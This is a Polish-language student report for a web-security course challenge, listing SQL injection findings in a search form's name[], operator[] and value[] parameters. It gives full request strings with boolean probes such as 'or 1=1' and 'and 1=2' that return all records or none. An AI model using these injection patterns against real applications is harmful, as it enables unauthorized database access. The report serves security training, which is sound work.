threats.pl > Bezpieczeństwo aplikacji internetowych > Lekcja 25: Wyzwanie V > Raport: Ice (2010-12-27)

Raport błędów, Ice (2010-12-27)

Date: Mon, 27 Dec 2010 18:05:27 +0100
Subject: Re: Lekcja 25: Wyzwanie V
From: Ice 


Witam,

1.

w parametr name[] możemy wrzucić np. 'a', 1+2, select 1, select 'a' || 'b',
podobnie w value[], np. przy takich parametrach:

action=search&name[]=select
'a'&operator[]==&value[]='a'&oper=AND&name[]=&operator[]==&value[]=

dostaniemy wszystkie elementy, a przy takich:

action=search&name[]=select
'a'&operator[]==&value[]='b'&oper=AND&name[]=&operator[]==&value[]=

żadnych wyników


2.

parametr operator:

Typ wiadomości =2 => 4 wyniki
Typ wiadomości= 2 i w drugim rzędzie filtrów: ['a'] [='b' or 1=1 ] [] => 4
wyniki
Typ wiadomości= 2 i w drugim rzędzie filtrów: ['a'] [='a' and 1=2 ] [] => 0
wyników

action=search&name[]='a'&operator[]=='a' and 1=2

&value[]=&oper=AND&name[]=&operator[]==&value[]=

3.

parametr 'oper' poprawiony

pozdrawiam,
I.